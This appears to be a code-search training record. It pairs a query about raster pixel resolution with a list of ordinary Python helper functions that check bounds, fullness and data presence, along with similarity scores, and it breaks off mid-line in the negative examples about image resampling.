[ "def is_full_dimensional(self):\n\n return self.affine_dimension() == self.space_dimension()", "def is_dataset(self):\n return self._dataset is not None", "def ejscreen_areas_of_concern_data_exists(cls):\n return cls.EJSCREEN_AREAS_OF_CONCERN_SOURCE.is_file()", "def is_mainland(self):\n return self._is_mainland", "def all(self):\n for v in self.sects.values():\n if not np.all(v):\n return False\n if self.is_full():\n return True\n else:\n return np.all(self.defval)", "def is_full(self) -> bool:\n return self._array[0].all()", "def contains_origin(self):\n return self.contains(self.ambient_space().zero())", "def geospatial(self):\n return bool(\n self.dataset.GetProjection() or\n (self.dataset.GetGCPProjection() and self.dataset.GetGCPs()) or\n self.dataset.GetGeoTransform(can_return_null=True) or\n hasattr(self, '_netcdf'))", "def has_data(self):\n return ([0] != self.__contexts) and ([0] != self.__weights)", "def is_full(self):\n elements_in_sects = sum(\n map(opr.attrgetter(\"size\"), self.sects.values())\n )\n elements_in_total = fct.reduce(\n opr.mul, type(self).flatten_shape(self.shape), 1\n )\n res = elements_in_sects >= elements_in_total\n return res", "def test_contains(self):\n dim = Fidelity(\"epoch\", 1, 10)\n\n assert 0 not in dim\n assert 1 in dim\n assert 5 in dim\n assert 10 in dim\n assert 20 not in dim", "def full(self):\n for x in range(0,3):\n for y in range(0,3):\n if self[x,y] is None:\n return False\n return True", "def is_subset_of(self, uspec):\n \n if self.is_power_onoff() or uspec.is_power_onoff():\n return False\n \n if (uspec.is_bias() or not uspec.is_calib()) and self['speed'] != uspec['speed']:\n return False\n\n if int(self['x_bin']) % int(uspec['x_bin']) != 0 or int(self['y_bin']) % int(uspec['y_bin']) != 0:\n return False\n\n if self.number_windows() > 0:\n\n if not uspec.contains_window(self['x1_start'], self['y1_start'], self['x1_size'], self['y1_size'], self['x_bin'], self['y_bin']):\n return False\n\n if self.number_windows() > 1:\n\n if not uspec.contains_window(self['x2_start'], self['y2_start'], self['x2_size'], self['y2_size'], self['x_bin'], self['y_bin']):\n return False\n\n return True", "def any(self):\n for v in self.sects.values():\n if np.any(v):\n return True\n if self.is_full():\n return False\n else:\n return np.any(self.defval)", "def is_land(self, only_land: bool = False) -> bool:\n generator = (\n any(_type.name == \"Land\" for _type in face.types.all())\n for face in self.faces.all()\n )\n if only_land:\n return all(generator)\n return any(generator)", "def _is_legal(self, h5_main, variables=None):\n if variables is None:\n variables = ['DC_Offset']\n\n file_data_type = get_attr(h5_main.file, 'data_type')\n meas_grp_name = h5_main.name.split('/')\n h5_meas_grp = h5_main.file[meas_grp_name[1]]\n meas_data_type = get_attr(h5_meas_grp, 'data_type')\n\n if h5_main.dtype != sho32:\n warn('Provided dataset is not a SHO results dataset.')\n return False\n\n # This check is clunky but should account for case differences. If Python2 support is dropped, simplify with\n # single check using casefold.\n if not (meas_data_type.lower != file_data_type.lower or meas_data_type.upper != file_data_type.upper):\n warn('Mismatch between file and Measurement group data types for the chosen dataset.')\n print('File data type is {}. The data type for Measurement group {} is {}'.format(file_data_type,\n h5_meas_grp.name,\n meas_data_type))\n return False\n\n if file_data_type == 'BEPSData':\n if get_attr(h5_meas_grp, 'VS_mode') not in ['DC modulation mode', 'current mode']:\n warn('Provided dataset is not a DC modulation or current mode BEPS dataset')\n return False\n elif get_attr(h5_meas_grp, 'VS_cycle_fraction') != 'full':\n warn('Provided dataset does not have full cycles')\n return False\n\n elif file_data_type == 'cKPFMData':\n if get_attr(h5_meas_grp, 'VS_mode') != 'cKPFM':\n warn('Provided dataset has an unsupported VS_mode.')\n return False\n\n return super(BELoopFitter, self)._is_legal(h5_main, variables)", "def is_consistent_dataset(data: dict, parameter_box: np.ndarray = None) -> bool:\n train_set = copy.deepcopy(data)\n y, phi = train_set[\"outputs\"].pop(-1), train_set[\"features\"].pop(-1)\n y, phi = np.array(y)[..., np.newaxis], np.array(phi)[..., np.newaxis]\n if train_set[\"outputs\"] and train_set[\"features\"]:\n theta, _, gramian, beta = confidence_polytope(train_set, parameter_box=parameter_box)\n return is_valid_observation(y, phi, theta, gramian, beta)\n else:\n return True", "def is_full(self) -> bool:", "def has_dimension(self, dim):\n\n return self.units.dimensions == dim", "def isEmptyLandmarkset(self):\n return self.subsetpointcloud is None", "def isComplete(self):\n assert len(self._x) > 0\n assert len(self._y) > 0\n assert 2 == len(self._data_array.shape)\n assert self.wkt is not None\n assert self.wkt != ''\n\n return True", "def maybe_distal(self):\n return bool(set(self.locations) & set(StandardTerminology.DISTAL_LOCATIONS))", "def test_outside_grid(dataset):\n\n tf = Delft3D_Mudflats(dataset, dry_depth=-10000) # make sure nothing is dry\n\n points = ((3.5, 54.0), # off\n (7.5, 53.4), # off\n (6.0, 52.0), # off\n (5.3, 53.3), # on\n (5.2, 53.25), # on\n )\n\n time = datetime(2009, 1, 15, 0)\n\n result = tf.is_dry(points, time)\n\n print \"results\", result\n\n assert list(result) == [True, True, True, False, False]", "def get_allsky(self):\n band = self.get_band()\n septon = self.is_septon()\n if band == '10_90' or band == '30_90' or septon:\n allsky = True\n else:\n allsky = False\n return allsky", "def check_empty(self, coord):\n x, y, z = coord\n if self.perlin_3d(x, y, z) <= 0:\n return True\n else:\n return False", "def test_contains_bounds(self):\n dim = Dimension(\"yolo\", \"uniform\", -3, 4)\n with pytest.raises(NotImplementedError):\n assert -3 in dim", "def is_full(self):\n return len(self.walls) == 4", "def check_visibility(self):\r\n\r\n for gs in self.ground_stations:\r\n if self.visible ^ (elevation_dot_product(self.r_ecef,self.ground_stations[gs][1],self.earth) > 0.0):\r\n self.visible ^= 1\r\n self.gs_id = self.ground_stations[gs][0]\r\n return True", "def is_distal(self):\n return bool(set(self.locations) and set(self.locations) <= set(StandardTerminology.DISTAL_LOCATIONS)) \\\n or bool(self.depth and 16 < self.depth < 82)", "def __contains__(self, point):\n for component, dim in zip(point, self.dimensions):\n if component not in dim:\n return False\n return True", "def contains(self, x):\n # need more to assure its a real SSP - ie on right torus\n return (len(x) == self._shape[0])", "def is_fitted(self):\n return self.__fdata is not None", "def is_infrastructure (self):\n return sum([1 for i in self.infras]) != 0", "def _in_bounds(self, x, y):\r\n return 0 <= x < 8 and 0 <= y < 8", "def has_osm_data(self):\n return settings.MSPRAY_OSM_PRESENCE_FIELD in self.data", "def exists_dataset(self, dataset):\n assert dataset, \"Must input a valid dataset name.\"\n return any(self.get_by_dataset(dataset))", "def is_full(self):\n return len(self._data) == 1", "def is_full(self):\n return False", "def _has_coordinates_and_gradient(self) -> bool:\n return self._coords is not None and self._coords.g is not None", "def is_artificial(self):\n\t\treturn 0", "def is_on_ground(self):\n return bool(self.ground_sprites())", "def detect_in_bounds(self):\n creature_x, creature_y = self.creature.current_location\n if creature_x < 0 or creature_x >= self.world_width\\\n or creature_y < 0 or creature_y >= self.world_height:\n print('The creature is out of bounds!')\n return False\n return True", "def healthy_test(obj: np.ndarray) -> bool:\n nb_rows, nb_cols = obj.shape\n return nb_rows == nb_cols > 1 and np.array_equal(obj, colony(nb_rows))", "def check_tile_covers_land(self, tilename=None):\n land_tiles = self.list_tiles_covering_land()\n if self.check_tilename(tilename):\n tilename = self.tilename2short(tilename)\n return tilename in land_tiles", "def _is_vessel_full(self):\n return np.size(np.where(self.end_of_lanes + (np.ones(self.lanes) * self.minimal_package) <= self.rows)) == 0", "def can_attack_world(self, world: World) -> bool:\n forces = self.context.calculate_forces(world)\n return (\n forces.space_forces <= self.max_space_force\n and forces.ground_forces <= self.max_ground_force\n )", "def in_bounds(self, x, y):\n return x >= 0 and x < 8 and y >= 0 and y < 8", "def exposed(self, position):\r\n x, y, z = position\r\n for dx, dy, dz in FACES:\r\n if (x + dx, y + dy, z + dz) not in self.world:\r\n return True\r\n return False", "def _loaded_data(self):\n try:\n dsize = [int(d) for d\n in self.run('fits size', via='get').split()]\n except (ValueError, TypeError, AttributeError) as err:\n log.debug(f' FITS size error: {err}')\n return False\n else:\n if 0 in dsize:\n return False\n else:\n return True", "def is_alld(self):\n g = self.get_gene().get_seq()\n for i in range(1, len(g)):\n if g[i] is 'c':\n return False\n return True", "def contains(self, coord):\n # print(coord, self.position, self.size)\n return (0 <= coord[0] - self.position[0] < self.size[0] and\n 0 <= coord[1] - self.position[1] < self.size[1])", "def wid_in(self, wid):\n \n for row in self.tiles:\n if wid in row:\n return True\n return False", "def is_full(self):\n return self.name and self.variables and self.assumptions and self.guarantees", "def in_water(latitude: float, longitude: float) -> bool:\n path = os.path.abspath('water_polygons.shp')\n with fiona.open(path) as fiona_collection:\n box_detail = 0.0001\n point = Point(longitude, latitude)\n # here we filter to only scan results near the point in question.\n for record in fiona_collection.filter(bbox=(\n longitude+box_detail, latitude+box_detail,\n longitude-box_detail, latitude-box_detail)):\n if record['geometry']:\n shape = asShape(record['geometry'])\n if shape.contains(point):\n return True\n return False", "def exists(dtype, name, rootdir=None):\n return FreezableAPI.to_slug(dtype,name) in FreezableAPI.datasets(rootdir=rootdir)", "def has_dominance(self):\n trait = self.traitDao.get_dominance(self.name)\n if trait is None:\n return False\n else:\n return True", "def has_data(self, fit_id, species_id, start=None, stop=None):\n if not (fit_id in self.raw_results and species_id in\\\n self.raw_results[fit_id]):\n return False\n if all([isinstance(x, datetime) for x in [start, stop]]):\n ts = self.raw_results[fit_id][\"start\"]\n if not any([start < x < stop for x in ts]):\n return False\n return True", "def is_dataset_in_t_range(dataset, t_min, t_max):\n for obj in dataset.object_names:\n obj_data = dataset.data[obj]\n t_min_obj = np.min(obj_data['mjd'])\n t_max_obj = np.max(obj_data['mjd'])\n if (t_min_obj < t_min) or (t_max_obj > t_max):\n return False\n return True", "def is_island(self):\n return bool(not self.children.exists() and not self.parents.exists())", "def has_2D(self):\n\t\tif self.have_fastas is False:\n\t\t\tself._extract_fastas_from_fast5()\n\t\t\tself.have_fastas = True\n\n\t\tif self.fastas.get('twodirections') is not None:\n\t\t\treturn True\n\t\treturn False", "def verify(self):\n D,S,I,C = False,False,False,False\n if self.geoData and os.path.exists(self.geoData):\n D = True\n if self.scales:\n S = True\n if type(self.idVariable) == int:\n I = True\n if self.cacheFile:\n C = True\n if D and S and I and C:\n return True\n return False", "def covers(self, right: GeoSpatialValue) -> ir.BooleanValue:\n return ops.GeoCovers(self, right).to_expr()", "def HasData(self, search_all_index = False):\n\t\tif not search_all_index:\n\t\t\treturn ExistsFile(self.__datafilename(self.__pindex))\n\t\tfor pindex in range(0, len(GV.provinces)):\n\t\t\tif ExistsFile(self.__datafilename(pindex)):\n\t\t\t\treturn True\n\t\treturn False", "def is_full(self) -> bool:\n pass", "def has_fullhouse(self):\n if self.has_pair() & self.has_three_of_a_kind():\n self.rank_per_hand['5'] = \"full house\"\n return True\n return False", "def is_valid(self, dataset):\n pass", "def contains(self, point):\n return 0 <= point.x <= 1 \\\n and 0 <= point.y <= 1 \\\n and 0 <= point.z <= 1", "def has_guardian(self):\n return self.tiles.count(3) > 0", "def __contains__(self, item):\n return item in self.default_dataset", "def in_bounds(self, location: tuple) -> bool:\n return 0 <= min(location) and max(location) <= 7", "def can_exist_outside_of_game(self):\n return True", "def can_exist_outside_of_game(self):\n return True", "def checkBottom(self):\n exposed = True\n for sprite in self.overlapping_sprites:\n if sprite not in self.game.neutrinos:\n a = abs(self.bottom - sprite.top)\n b = abs(self.top - sprite.bottom)\n c = abs(self.left - sprite.right)\n d = abs(self.right - sprite.left)\n if a < b and a < c and a < d:\n exposed = False\n break\n return exposed", "def is_allc(self):\n g = self.get_gene().get_seq()\n for i in range(1, len(g)):\n if g[i] is 'd':\n return False\n return True", "def in_geo_limits(args: argparse.Namespace, track_data: dict) -> bool:\n return (track_data['boundaries']['north'] <= args.north_lim and\n track_data['boundaries']['south'] >= args.south_lim and\n track_data['boundaries']['east'] <= args.east_lim and\n track_data['boundaries']['west'] >= args.west_lim)", "def has_datapoint_with_all_dims(fake_ingest, dims):\n for datapoint in fake_ingest.datapoints:\n if has_all_dims(datapoint, dims):\n return True\n return False", "def is_full(self):", "def is_loaded(self):\n return self.known_stations != {}", "def any(self):\n boolean = True\n if type(self.idxs) == np.ndarray:\n boolean = all(self.idxs.shape)\n elif type(self.idxs) == list:\n sh = np.array(self.idxs).shape\n if len(sh) >= 2:\n boolean = np.all(sh)\n return boolean", "def is_worthless(self):\n self.normalize()\n return self.all_details['normalized'] in WORTHLESS_UA_TYPES", "def can_contain(self):\n return False", "def test_contains_extra_bounds(self):\n dim = Real(\"yolo\", \"norm\", 0, 3, low=-3, high=+3)\n assert dists.uniform.rvs(-3, 3) in dim\n assert -4 not in dim\n assert +4 not in dim\n assert (1, 2) not in dim", "def hasAtlasPos(self):\n return self.doesHaveAtlasPos", "def contains(self, point):\n if in_range(point[0], self.xrange) and in_range(point[0], self.yrange) and in_range(point[0], self.zrange):\n return True\n return False", "def IsBound(self) -> bool:", "def __cell_is_in_map(self, x, y) -> bool:\n return x >= 0 and y >= 0 and x < self.occupancy_map.info.width and y < self.occupancy_map.info.height", "def is_won(self):\n for tile in self:\n if not tile.is_mine and tile.visibility != 1:\n return False\n return True", "def ValidClusterRanges(self):\n for cluster_range in self.cluster_ranges:\n the_range = cluster_range.split(\"-\")\n print(f\"Checking that range {the_range} falls within our data area\")\n try:\n if int(the_range[0]) < self.low_data_cluster or int(the_range[1]) > self.high_data_cluster:\n print(f\"False. {the_range[0]} or {the_range[1]} is outside of our data area\")\n return False\n except TypeError as t_err:\n print(f\"Error. Range does not appear to be an int\")\n return False\n return True", "def is_sealed(self):\n return self.walls == Direction.All", "def has_geom(self):\n return bool(self.give_geom())", "def is_water(self):\n return False", "def is_water(self):\n return False", "def can_attack_world(self, world: World) -> bool:\n forces = self.context.calculate_forces(world)\n return (\n forces.space_forces <= self.max_space_force\n and (forces.space_forces - forces.missile_forces)\n < self.max_nonmissile_forces\n )", "def satifiesWinConditions(self, coordinates):\n if self.treasureCaptured and (self.x, self.y) in coordinates:\n return True\n else:\n return False", "def _inside(self, x, y):\n wx, wy, w, h = self._raw_graph_window_dim()\n if wx <= x < wx + w and wy <= y < wy + h:\n return True\n return False", "def isValidForSimulation(self):\n for position, myQuad in self.myDesign.quads.iteritems():\n if myQuad.components != {}:\n return 1\n return 0", "def is_full(self):\n\n current_board = self.current_board\n remaining_rows = 0\n\n for row in current_board:\n if \"-\" in set(row):\n remaining_rows += 1\n\n if remaining_rows == 0:\n return True\n else:\n return False", "def isWin(self):\n\n return self.tiles == self.winCdt", "def _is_small_net(self):\n dataset_name = self.params.dataset_name.lower()\n key_words = ['cifar', 'tinyimages', 'svhn']\n return any([k in dataset_name for k in key_words])", "def isPlayed(self):\n return bool(self.viewedLeafCount == self.leafCount)" ]
[ "0.6345008", "0.63167757", "0.61752814", "0.60833305", "0.60241663", "0.6015851", "0.5980115", "0.59584624", "0.5937705", "0.5922513", "0.5917669", "0.59084296", "0.5877617", "0.5835224", "0.5827307", "0.5806919", "0.5801645", "0.57821", "0.5778381", "0.57413006", "0.57294166", "0.57176024", "0.57168955", "0.5715005", "0.57148254", "0.5713452", "0.5700437", "0.56934506", "0.5690477", "0.56834704", "0.5671516", "0.56495833", "0.56487656", "0.5633129", "0.5620331", "0.5585798", "0.55845815", "0.5579061", "0.5575254", "0.5565395", "0.5564361", "0.5554601", "0.5553543", "0.555065", "0.5549018", "0.55473197", "0.5545934", "0.5545503", "0.55440986", "0.55415726", "0.5528029", "0.5523839", "0.5516372", "0.5513708", "0.55035424", "0.5502852", "0.5502389", "0.54958874", "0.5494785", "0.5493976", "0.54938775", "0.54918957", "0.54900086", "0.5489074", "0.5485017", "0.548476", "0.5484562", "0.54776025", "0.5477495", "0.5473537", "0.5471521", "0.5471521", "0.5466949", "0.5460795", "0.54567075", "0.5456264", "0.5456242", "0.54510087", "0.5448426", "0.5447151", "0.5446548", "0.5445015", "0.5434507", "0.54247504", "0.54246503", "0.54240036", "0.54225314", "0.5421749", "0.5415321", "0.54148155", "0.54107237", "0.54107237", "0.5406654", "0.54047304", "0.5396586", "0.53917164", "0.5391677", "0.53868324", "0.5386621", "0.5386443" ]
0.68909526
0
of the source data; this usually means upsampling the data, but if the pixel dimensions are slightly smaller than a given resolution, and equal within error tolerance, that resolution will get chosen as the native one.
def GetNativeResolution(self, transform=None, maximum=None): # Get the source projection's units for a 1x1 pixel, assuming square # pixels. width, height = self.GetPixelDimensions() src_pixel_size = min(abs(width), abs(height)) if transform is None: dst_pixel_size = src_pixel_size dst_ref = self.GetSpatialReference() else: # Transform these dimensions into the destination projection dst_pixel_size = transform.TransformPoint(src_pixel_size, 0)[0] dst_pixel_size = abs(dst_pixel_size) dst_ref = transform.dst_ref # We allow some floating point error between src_pixel_size and # dst_pixel_size based on the major circumference so that the error is # in the destination units error = max(*dst_ref.GetPixelDimensions(resolution=0)) / 128 # Find the resolution where the pixels are smaller than dst_pixel_size. for resolution in count(): if maximum is not None and resolution >= maximum: return resolution res_pixel_size = max( *dst_ref.GetPixelDimensions(resolution=resolution) ) if (res_pixel_size - dst_pixel_size) <= error: return resolution # Halve error each resolution error /= 2
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def change_resolution(img):\n scale_factor = np.random.choice(list(range(0, 6, 2)))\n if scale_factor == 0:\n return img\n downsample = nn.AvgPool2d(scale_factor)\n upsample = nn.UpsamplingNearest2d(scale_factor=scale_factor)\n new_res_img = upsample(downsample(img.unsqueeze(dim=1))).squeeze()\n return new_res_img", "def data_resampler (self, data):\r\n data = librosa.resample(data, orig_sr = original_sampling, target_sr = self.target_sampling)\r\n \r\n return data", "def rasterio_resample(dataset: Dataset, target_resolution: float, new_nodata: object = 'auto',\n resampling_method: Optional[rio_warp.Resampling] = rio_warp.Resampling.nearest,\n output_datatype: Optional[np.dtype] = np.float32) -> Dataset:\n\n # Detect if resolution is not square\n if dataset.meta[\"resolution\"][0] != dataset.meta[\"resolution\"][1]:\n raise RuntimeError(\"Tried to resample a dataset that doesn't have a square resolution!\")\n\n # Calculate scale factor\n scaling = int(dataset.meta[\"resolution\"][0]) / float(target_resolution)\n\n # Copy data from source Dataset\n source_crs = deepcopy(dataset.profile[\"crs\"])\n source_transform = deepcopy(dataset.profile[\"transform\"])\n source_nodata = deepcopy(dataset.nodata)\n\n # Calculate profile/transform and transfer elements\n new_transform = Affine(source_transform.a / scaling, source_transform.b, source_transform.c, source_transform.d,\n source_transform.e / scaling, source_transform.f)\n new_height = int(dataset.profile[\"height\"] * scaling)\n new_width = int(dataset.profile[\"width\"] * scaling)\n new_resolution = (target_resolution, target_resolution)\n new_nodata = source_nodata if new_nodata == \"auto\" else new_nodata\n new_crs = source_crs # [TODO] Add ability to change CRS in rasterio resample function\n\n # Update profile to match output\n dataset.nodata = new_nodata\n dataset.profile.update(\n res=(float(target_resolution), float(target_resolution)),\n transform=new_transform,\n height=new_height,\n width=new_width,\n nodata=new_nodata\n )\n dataset.profile.data[\"pixel_dimensions\"] = (float(target_resolution), float(target_resolution))\n dataset.meta[\"resolution\"] = new_resolution\n\n # Change datatype of all bands\n # [TODO] There may be a way to save memory by freeing old type ndarrays\n for band_id, band_value in dataset.bands.items():\n dataset.bands[band_id] = band_value.astype(output_datatype)\n\n # Run resampling on each band\n for band_key, band_data in dataset.bands.items():\n # Create an array in the correct resampled dimensions\n resampled_array = np.ma.asanyarray(np.empty(shape=(new_width, new_height), dtype=output_datatype))\n\n # Resample/warp\n rio_warp.reproject(band_data, resampled_array, src_transform=source_transform, dst_transform=new_transform,\n width=new_width, height=new_height, src_nodata=source_nodata, dst_nodata=new_nodata,\n src_crs=source_crs, dst_crs=new_crs, resample=resampling_method)\n\n # Set value in dictionary\n dataset.bands[band_key] = resampled_array\n\n return dataset", "def _sample_single(self):\n ss = super(SuperResolutions, self)._sample_single()\n image = ss['data']\n # Down sample\n max_down_sample = max(self.data_down_sample, self.label_down_sample)\n if self.is_down_sample:\n images = []\n images.append(image)\n for i in range(max_down_sample):\n image = self.downsample(image)\n images.append(image)\n data = images[self.data_down_sample]\n label = images[self.label_down_sample]\n return {'data': data, 'label': label}", "def get_raw_image_sizes() -> set:\n sizes = set()\n data = SUNRGBDTrainDataset(True, augment=False)\n for i in range(len(data)):\n sizes.add(data[i][0].shape)\n return sizes", "def resample(self):\n pass", "def data_type_ratio(self):\n if self.sample_size:\n return float(self.match_count) / self.sample_size\n return None", "def minimum_sampling(self):\n # TODO: Allow `Source` to understand when this returns None?\n return 1.", "def data_resolution_and_offset(data):\n res = (data[data.size - 1] - data[0]) / (data.size - 1.0)\n off = data[0] - 0.5 * res\n return numpy.asscalar(res), numpy.asscalar(off)", "def _compute_output_resolution(input_spatial_resolution, kernel_size, stride,\n total_padding):\n if (input_spatial_resolution is None) or (kernel_size is None) or (\n stride is None) or (total_padding is None):\n return None\n return int(\n math.ceil((\n input_spatial_resolution + total_padding - kernel_size + 1) / stride))", "def upsample(self, method):\n from scipy.signal import resample\n from scipy.ndimage.interpolation import zoom\n #print \"mm: 100 x 100 x 131\"\n #print \"Dims:\", self.D.shape\n fact = np.array(self.info.shape).astype(\"float32\") / np.array(self.info.read_shape).astype(\"float32\")+0.00001 # hrmpf!!\n if method == \"zoom\":\n print \"Resampling...\"\n self.D = zoom(self.D, fact).astype(\"float32\")\n elif method == \"resample\":\n print \"Resampling...\"\n a = self.info.resample_ax\n s = self.info.shape[a]\n self.D = resample(self.D, s, axis=a, window=10).astype(\"float32\")\n elif method == None:\n pass\n else:\n raise NotImplementedError(\"Unknown upsampling method: %s\" % method)\n #print \"Dims:\", self.D.shape\n print \"done.\"", "def get_resolution(testdata):\n diffs = np.transpose([testdata[1:, 0], np.diff(testdata[:, 0])])\n resolutions = ud.safedivide(diffs[:, 0], diffs[:, 1])\n # popt, pcov = scipy.optimize.curve_fit(fit_line, diffs[:, 0], resolutions, maxfev=1000000)\n # fitLine = fit_line(diffs[:, 0], *popt)\n # fitMax = np.max(fitLine)\n # fitMin = np.min(fitLine)\n # diffs_new = diffs[(1.2 * fitMin < resolutions) & (resolutions < 1.2 * fitMax)]\n # resolutions_new = resolutions[(1.2 * fitMin < resolutions) & (resolutions < 1.2 * fitMax)]\n # popt2, pcov2 = scipy.optimize.curve_fit(fit_line, diffs_new[:, 0], resolutions_new, maxfev=1000000)\n # plt.figure()\n # plt.plot(diffs[:,0], resolutions)\n # plt.plot(diffs[:, 0], fit_line(diffs[:, 0], *popt2), 'r-')\n # plt.show()\n # Currently use A * m ^1.5 (0.5?)\n # Maybe use a*M^b\n # return popt2\n return np.median(resolutions)", "def quickMinMax(self, targetSize=1e6):\n data = self.image\n if targetSize < 2: # keep at least two pixels\n targetSize = 2\n while True:\n h, w = data.shape[:2]\n if h * w <= targetSize: break\n if h > w:\n data = data[::2, ::] # downsample first axis\n else:\n data = data[::, ::2] # downsample second axis\n return self._xp.nanmin(data), self._xp.nanmax(data)", "def test_alt_source(self):\n sp2 = SourceSpectrum(\n GaussianFlux1D, amplitude=self.sp.model.amplitude.value,\n mean=self.sp.model.mean.value, stddev=self.sp.model.stddev.value)\n w = [3900, 4000, 4060] * u.AA\n assert_quantity_allclose(sp2(w), self.sp(w))", "def test_resample_methods():\n with xr.open_rasterio(TEST_RASTER_PATH) as src:\n try:\n cvs.raster(src, upsample_method='santaclaus', downsample_method='toothfairy')\n except ValueError:\n pass\n else:\n assert False\n\n try:\n cvs.raster(src, upsample_method='honestlawyer')\n except ValueError:\n pass\n else:\n assert False\n\n try:\n cvs.raster(src, downsample_method='tenantfriendlylease')\n except ValueError:\n pass\n else:\n assert False", "def get_resolution(self):\n ret_val = False\n width = 0\n height = 0\n try:\n sink = self.player.get_by_name('sink')\n sample = GstBase.BaseSink.get_last_sample(sink)\n caps = Gst.Sample.get_caps(sample)\n struct = Gst.Caps.get_structure(caps, 0)\n h_result, height = Gst.Structure.get_int(struct, \"height\")\n w_result, width = Gst.Structure.get_int(struct, \"width\")\n if h_result and w_result:\n ret_val = True\n except:\n ret_val = False\n\n return ret_val, width, height", "def preprocess_data(tensors_lr):\n n = input_radius\n m = upsample_rate\n\n # flatten DT matrices\n s = tensors_lr.shape\n print(\"Low resolution tensors shape:\", s)\n tensors_lr = np.reshape(tensors_lr, (s[0], s[1], s[2], 9))\n\n # the target resolution after upsampling\n target_resolution = (s[0]*m, s[1]*m, s[2]*m, 3, 3)\n print(\"Target resolution after upsampling:\", target_resolution)\n\n # remove duplicate entries to obtain the 6 unique parameters\n tensors_lr = np.delete(tensors_lr, [3, 6, 7], axis=3)\n\n all_indices = utils.create_triples(s[0], s[1], s[2])\n\n return all_indices, tensors_lr, target_resolution", "def _resolution(self):\n _, xres, _, _, _, yres = self.geotransform\n return xres, yres", "def minimum_sampling(self):\n # Sampling in arcsec / pixel\n sampling = self.seeing.minimum_sampling()\n try:\n # Try using `intrinsic` as an object\n sampling = min(self.intrinsic.minimum_sampling(), sampling)\n except AttributeError:\n pass\n return sampling", "def test_read_unscale():\n with rasterio.open(COG_SCALE) as src_dst:\n arr, mask = reader.tile(src_dst, 218, 99, 8, tilesize=128)\n arrS, maskS = reader.tile(src_dst, 218, 99, 8, tilesize=128, unscale=True)\n\n assert arr.dtype == \"int16\"\n assert arrS.dtype == \"float32\"\n assert not numpy.array_equal(arr, arrS)\n numpy.testing.assert_array_equal(mask, maskS)\n\n meta = reader.metadata(src_dst)\n assert isinstance(meta[\"statistics\"][1][\"min\"], int)\n\n meta = reader.metadata(src_dst, unscale=True)\n assert isinstance(meta[\"statistics\"][1][\"min\"], float)\n\n p = reader.point(src_dst, [310000, 4100000], coord_crs=src_dst.crs)\n assert p == [8917]\n\n p = reader.point(\n src_dst, [310000, 4100000], coord_crs=src_dst.crs, unscale=True\n )\n assert round(p[0], 3) == 1000.892", "def GetResolution(vDataSet):\r\n xmin,xmax,ymin,ymax,zmin,zmax = GetExtent(vDataSet)\r\n nx,ny,nz = vDataSet.GetSizeX(),vDataSet.GetSizeY(),vDataSet.GetSizeZ()\r\n\r\n return (xmax-xmin)/nx, (ymax-ymin)/ny, (zmax-zmin)/nz", "def test_fit(self, model):\r\n fit = model/np.linalg.norm(model, axis=1, keepdims=True)\r\n if self.white:\r\n sources = self.sources.dot(self.zca_matrix)\r\n sources /= np.linalg.norm(sources, axis=1, keepdims=True)\r\n else:\r\n sources = self.sources\r\n allthedots = sources.dot(fit.T)\r\n # how close is the closest model source to each true source?\r\n bestfits = np.max(np.abs(allthedots), axis=1)\r\n return np.median(bestfits)", "def __call__(self, src, label):\r\n # img = mx.nd.image.to_tensor(src)\r\n # img = mx.nd.image.normalize(img, mean=self._mean, std=self._std)\r\n src = mx.nd.array(src)\r\n img = mx.nd.image.to_tensor(src)\r\n img = mx.nd.image.normalize(img, mean=self._mean, std=self._std)\r\n return img, mx.nd.array(label, dtype=img.dtype)", "def resample(self):\n # propagate networks\n self.z = self.prior_latent_distribution.sample()\n # reconstruct image\n self.y_hat_raw = self.fcomb(self.unet_features, self.z)\n\n return self.y_hat_raw", "def test_single_image_dataset_train_interpolation(mocker, simple_img):\n\n # This is in X, Y cooridnates\n fake_random_data = torch.Tensor(\n np.array(\n [\n [0.001, 0], # top left\n [0, 0.999], # bottom left\n [0.999, 0], # top right\n ]\n )\n )\n\n mock_random = mocker.patch(\"dataset.torch.rand\")\n mock_random.return_value = fake_random_data\n\n dataset = SingleImageDataset(simple_img, 3, normalize=False)\n assert len(dataset) == 9\n\n dataloader = DataLoader(dataset, batch_size=None, batch_sampler=None)\n\n n_iter = 0\n for x, y in dataloader:\n n_iter += 1\n x = x.numpy()\n y = y.numpy()\n expected_x = np.array(\n [\n [-0.998, -1], # Top left\n [-1, 0.998], # Bottom left\n [0.998, -1], # Top right\n ]\n )\n assert np.isclose(expected_x, x).all()\n\n expected_y = np.array(\n [\n [1.0, 2.0, 3.0],\n [4.0, 5.0, 6.0],\n [7.0, 8.0, 9.0],\n ]\n )\n assert np.isclose(expected_y, y, atol=0.05).all()\n\n assert n_iter == 9", "def __call__(self, src, label, mask):\n # resize shorter side but keep in max_size\n h, _, _ = src.shape\n img = timage.resize_short_within(src, self._short, self._max_size, interp=1)\n # no scaling ground-truth, return image scaling ratio instead\n im_scale = float(img.shape[0]) / h\n\n img = mx.nd.image.to_tensor(img)\n img = mx.nd.image.normalize(img, mean=self._mean, std=self._std)\n return img, mx.nd.array([img.shape[-2], img.shape[-1], im_scale])", "def __call__(self, src, label):\n # resize shorter side but keep in max_size\n h, w, _ = src.shape\n img = timage.resize_short_within(src, self._short, self._max_size, interp=1)\n # no scaling ground-truth, return image scaling ratio instead\n bbox = tbbox.resize(label, (w, h), (img.shape[1], img.shape[0]))\n im_scale = h / float(img.shape[0])\n\n img = mx.nd.image.to_tensor(img)\n img = mx.nd.image.normalize(img, mean=self._mean, std=self._std)\n return img, bbox.astype('float32'), mx.nd.array([im_scale])", "def upsampleImage( arr, kernelSize ):\n return scipy.ndimage.zoom( arr, kernelSize )", "def resample(source, target_size, transform):\n dtype = source.dtype\n dev = source.device\n\n height_, width_ = target_size\n ur_ = torch.arange(width_, dtype=dtype, device=dev) + 0.5\n vr_ = torch.arange(height_, dtype=dtype, device=dev) + 0.5\n\n height, weight = source.shape[2:]\n ur = 2 * ((ur_ + transform[0, 1]) / transform[0, 0]) / weight - 1\n vr = 2 * ((vr_ + transform[1, 1]) / transform[1, 0]) / height - 1\n\n v, u = torch.meshgrid(vr, ur)\n v = v.unsqueeze(2)\n u = u.unsqueeze(2)\n\n grid = torch.cat((u, v), dim=2)\n grid = grid.unsqueeze(0).expand(len(source), -1, -1, -1)\n\n return torch.nn.functional.grid_sample(source, grid)", "def calculate_image_scale(source_width, source_height, target_width, target_height):\n if source_width == target_width and source_height == target_height:\n return 1.0\n\n source_ratio = source_width / source_height\n target_ratio = target_width / target_height\n\n if target_ratio < source_ratio:\n scale = target_width / 